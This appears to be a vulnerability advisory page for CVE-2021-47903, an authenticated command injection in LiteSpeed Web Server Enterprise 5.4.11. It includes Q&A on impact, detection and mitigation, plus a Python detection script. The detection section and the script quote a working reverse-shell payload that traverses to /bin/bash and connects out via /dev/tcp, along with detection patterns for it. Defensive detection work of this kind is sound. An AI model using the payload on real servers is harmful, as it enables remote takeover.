CVE-2021-47903
Authenticated Command Injection in LiteSpeed Web Server 5.4.11 Enables RCE
Publication date: 2026-01-23
Last updated on: 2026-01-23
Assigner: VulnCheck
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| litespeedtech | lite_speed_web_server_enterprise | 5.4.11 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is an authenticated OS command injection (CWE-78) in LiteSpeed Web Server Enterprise version 5.4.11. An authenticated administrator can set the 'Command' parameter of an external application in the server's external app configuration interface to a value that is not a plain interpreter path. Because the value is used to build the command that launches the external application, a path traversal sequence can redirect it from the expected interpreter location to a system shell, and shell arguments appended to it are passed through. The result is remote code execution: the attacker runs arbitrary system commands on the server with the privileges of the web server's external application process. [2, 3]
How can this vulnerability impact me?
If exploited, this vulnerability allows an authenticated user with administrative access to execute arbitrary commands on the server. This can lead to full system compromise, including unauthorized access, data theft, service disruption, and potentially taking control of the entire server environment. Since the admin console is the entry point, an attacker only needs valid administrator credentials (stolen, guessed, or obtained through another weakness) to turn configuration access into code execution. [2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking for unauthorized or suspicious modifications in the external app configuration interface of LiteSpeed Web Server Enterprise version 5.4.11, specifically in the 'Command' parameter used to configure external applications. Since exploitation requires authenticated access, monitoring administrative actions and reviewing server configuration changes is essential. A practical detection method is to inspect HTTP POST requests to the /config/confMgr.php endpoint of the admin console for unusual values in the 'path' or 'Command' parameters: a legitimate value is a plain interpreter path such as fcgi-bin/lsphp5, so traversal sequences (../), absolute shell paths, or shell metacharacters are strong indicators. For example, monitor for a value similar to the payload fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1', which traverses out of the external app directory to /bin/bash and starts a reverse shell; the loopback address and port 1234 in this example are placeholders, and a real attacker would point the connection at their own listener. Network monitoring tools can detect the resulting unexpected outbound connections from the web server on uncommon ports (TCP port 1234 in the example). Specific checks include searching admin console and proxy logs for POST requests to /config/confMgr.php, reviewing the configured external application paths in the server configuration, and using tools such as tcpdump or netstat to identify suspicious outbound connections from the web server process. However, no exact detection commands are provided in the resources. [3, 2]
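The two checks described above, as an added example that is not part of the original advisory or of LiteSpeed's own tooling: the first inspects a captured admin-console request (for instance from a reverse proxy or WAF that logs POST bodies) and flags a POST to /config/confMgr.php whose 'path' or 'Command' value contains traversal or shell-injection markers; the second audits external application entries in an httpd_config.xml-style document. The `<extProcessor>`, `<name>` and `<path>` element names are assumed from the Enterprise XML configuration layout and should be verified against your own config file; all request and configuration samples are constructed, and the reverse-shell payload is the one quoted on this page.

```python
"""Detection helpers for CVE-2021-47903 (added example, not vendor code)."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlencode, urlsplit
from xml.sax.saxutils import escape

ADMIN_ENDPOINT = "/config/confMgr.php"
# Parameter names the advisory cites for the external-app command field.
COMMAND_PARAMS = ("Command", "path")

# Markers that never belong in a legitimate external-app interpreter path.
SUSPICIOUS = [
    (r"\.\./", "directory traversal"),
    (r"(^|/)(ba|da|z|k)?sh(\s|$|')", "shell binary as command"),
    (r"/dev/tcp/", "bash /dev/tcp reverse shell"),
    (r"[;&|`]|\$\(", "shell metacharacter"),
    (r"\s-c\s", "interpreter -c flag"),
]


def _scan(value):
    """Return the reasons a command/path value looks malicious (empty = clean)."""
    return [reason for pattern, reason in SUSPICIOUS if re.search(pattern, value)]


def flag_request(method, url, body):
    """Flag a captured admin-console request.

    Only POSTs to confMgr.php are examined, since that is where external-app
    configuration is submitted. Returns (parameter, value, reason) tuples.
    """
    if method.upper() != "POST" or urlsplit(url).path != ADMIN_ENDPOINT:
        return []
    findings = []
    params = parse_qs(body, keep_blank_values=True)
    for name in COMMAND_PARAMS:
        for value in params.get(name, []):
            for reason in _scan(value):
                findings.append((name, value, reason))
    return findings


def audit_ext_apps(xml_text):
    """Audit configured external apps in an httpd_config.xml-style document.

    Element names (extProcessor/name/path) are an assumption about the
    Enterprise XML layout. Returns (app name, path, reason) for each hit.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for proc in root.iter("extProcessor"):
        name = proc.findtext("name", default="?")
        path = proc.findtext("path", default="")
        for reason in _scan(path):
            findings.append((name, path, reason))
    return findings


# Constructed sample data (not captured from a real system). The payload is
# the reverse-shell command quoted in the advisory; 127.0.0.1:1234 is a placeholder.
PAYLOAD = ("fcgi-bin/lsphp5/../../../../../bin/bash -c "
           "'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'")
SAMPLE_REQUESTS = [
    ("POST", "/config/confMgr.php?m=ext", urlencode({"path": "fcgi-bin/lsphp5"})),
    ("POST", "/config/confMgr.php?m=ext", urlencode({"path": PAYLOAD})),
    ("GET", "/config/confMgr.php", ""),
]
# A config writer must XML-escape the value ('>&' is not valid raw in XML text).
SAMPLE_CONFIG = """<httpServerConfig>
  <extProcessorList>
    <extProcessor><type>lsapi</type><name>lsphp</name><path>fcgi-bin/lsphp5</path></extProcessor>
    <extProcessor><type>lsapi</type><name>evil</name><path>%s</path></extProcessor>
  </extProcessorList>
</httpServerConfig>""" % escape(PAYLOAD)


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        for name, value, reason in flag_request(*req):
            print(f"ALERT {req[0]} {req[1]} {name}={value!r}: {reason}")
    for name, path, reason in audit_ext_apps(SAMPLE_CONFIG):
        print(f"CONFIG extProcessor {name!r} path={path!r}: {reason}")
```

Running the script reports nothing for the benign lsphp5 entry and the GET request, and several findings (traversal, shell binary, /dev/tcp, metacharacters, `-c`) for the injected value in both the request and the configuration. The patterns are deliberately narrow to keep false positives low; a quoted, absolute interpreter path with no arguments is what a legitimate entry looks like, so anything the scanner flags deserves a manual look at who changed the setting and when.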
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the LiteSpeed Web Server Enterprise admin console to trusted users and trusted networks only, and ensuring strong authentication is in place for administrator accounts. Administrators should stop using version 5.4.11 and upgrade to a patched version if one is available. Monitoring and auditing configuration changes in the external app configuration interface helps detect exploitation attempts. Since the vulnerability requires authenticated access, limiting the number of administrator accounts and enforcing least privilege reduces risk. If possible, disable or restrict use of the 'Command' parameter in external app settings. A graceful server restart is required after configuration changes, so it is also the step that applies a fix or reverts a malicious external app entry; review the configured external application paths before restarting. Network-level protections such as firewall rules that block unexpected outbound connections from the web server (for example, the reverse shell in the detection example) can limit the impact of a successful injection. [2, 3]